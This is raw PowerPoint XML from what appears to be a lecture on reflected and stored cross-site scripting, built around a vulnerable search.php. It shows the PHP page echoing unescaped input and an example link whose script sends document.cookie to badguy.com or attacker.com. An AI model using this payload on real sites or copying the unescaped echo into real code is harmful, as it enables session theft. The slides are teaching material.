              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;    &lt;TITLE&gt; Search Results &lt;/TITLE&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for &lt;?php echo $_GET[term] ?&gt; :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/BODY&gt;   &lt;/HTML&gt;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581400" y="5257804"/>
            <a:ext cx="4435070" cy="1482781"/>
            <a:chOff x="3505200" y="4495800"/>
            <a:chExt cx="4578137" cy="2287048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13317" name="Rounded Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="4495800"/>
              <a:ext cx="4419600" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst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/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13318" name="Freeform 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5580993" y="5155324"/>
              <a:ext cx="1387366" cy="614855"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T1" fmla="*/ 614855 h 614855"/>
                <a:gd name="T2" fmla="*/ 504497 w 1387366"/>
                <a:gd name="T3" fmla="*/ 409904 h 614855"/>
                <a:gd name="T4" fmla="*/ 0 w 1387366"/>
                <a:gd name="T5" fmla="*/ 0 h 614855"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1387366"/>
                <a:gd name="T10" fmla="*/ 0 h 614855"/>
                <a:gd name="T11" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T12" fmla="*/ 614855 h 6148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87366" h="614855">
                  <a:moveTo>
                    <a:pt x="1387366" y="614855"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1061545" y="563617"/>
                    <a:pt x="735725" y="512380"/>
                    <a:pt x="504497" y="409904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273269" y="307428"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr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/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13319" name="TextBox 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6156391" y="5785944"/>
              <a:ext cx="1926946" cy="996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mtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>echo search term </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>into response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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="1676400"/>
            <a:ext cx="7848600" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFFFF"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Bad input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28600" y="1143000"/>
            <a:ext cx="2590800" cy="457200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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12953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219200"/>
            <a:ext cx="8305800" cy="563880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mtClean="0"/>
              <a:t>Consider link:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>(properly URL encoded)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smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term =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b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		&lt;script&gt; window.open(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b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			“http://badguy.com?cookie = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean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” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ 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b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			document.cookie )  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" u="sng" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0"/>
              <a:t>What if user clicks on this link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Browser goes to    victim.com/search.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Victim.com returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; Results for &lt;script&gt; … &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Browser executes script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sends badguy.com   cookie  for victim.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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762002" y="2247901"/>
            <a:ext cx="6875463" cy="4076700"/>
            <a:chOff x="762000" y="2247900"/>
            <a:chExt cx="6875463" cy="4076700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15380" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762000" y="5257800"/>
              <a:ext cx="4648200" cy="1066800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/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15381" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4381500" y="2247900"/>
              <a:ext cx="3255963" cy="295275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/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="TextBox 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4667250"/>
            <a:ext cx="5334000" cy="19621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marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  window.open(http://attacker.com? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ... document.cookie ...) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15365" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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00200"/>
            <a:ext cx="1436688" cy="143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6" name="Picture 11" descr="CompaqAlphaServerES4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70738" y="4446589"/>
            <a:ext cx="1155700" cy="142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7" name="Picture 4" descr="DS15serverfron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4188" y="609600"/>
            <a:ext cx="2436812" cy="846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8" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943601" y="228600"/>
            <a:ext cx="14261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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15369" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6773864" y="4019549"/>
            <a:ext cx="14877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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15370" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1069975"/>
            <a:ext cx="3211512" cy="6873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 type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15371" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228601" y="2971800"/>
            <a:ext cx="13495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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15372" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2576231" y="998022"/>
            <a:ext cx="18246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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user gets bad link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15373" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2743200"/>
            <a:ext cx="4572000" cy="144780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5374" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1101636">
            <a:off x="3044827" y="3001447"/>
            <a:ext cx="2570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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user clicks on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15375" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3300415" y="3680896"/>
            <a:ext cx="30003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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim echoes user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15376" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752602" y="3105149"/>
            <a:ext cx="5021263" cy="1619251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 type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1944689"/>
            <a:ext cx="4458272" cy="646331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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://victim.com/search.php ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> term = &lt;script&gt; ... &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C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7200" y="4362451"/>
            <a:ext cx="5334000" cy="304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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.victim.com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76600" y="1639888"/>
            <a:ext cx="44577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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.attacker.com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XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387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An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Methods for injecting malicious code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Reflected XSS (“type 1”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the attack script is reflected back to the user as part of a page from the victim site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Stored XSS (“type 2”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the attacker stores the malicious code in a resource managed by the web application, such as a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Others, such as DOM-based attacks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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Basic scenario: reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17411" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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601914"/>
            <a:ext cx="1436688" cy="143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11" descr="CompaqAlphaServerES4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59475" y="4979989"/>
            <a:ext cx="1155700" cy="142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3" name="Picture 4" descr="DS15serverfron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4188" y="1905000"/>
            <a:ext cx="2436812" cy="846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5943601" y="1524000"/>
            <a:ext cx="14261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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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5562600" y="4552949"/>
            <a:ext cx="14877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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17416" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="6873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7417" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="3886200"/>
            <a:ext cx="12666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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4107" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="3118114" y="1679059"/>
            <a:ext cx="188224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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
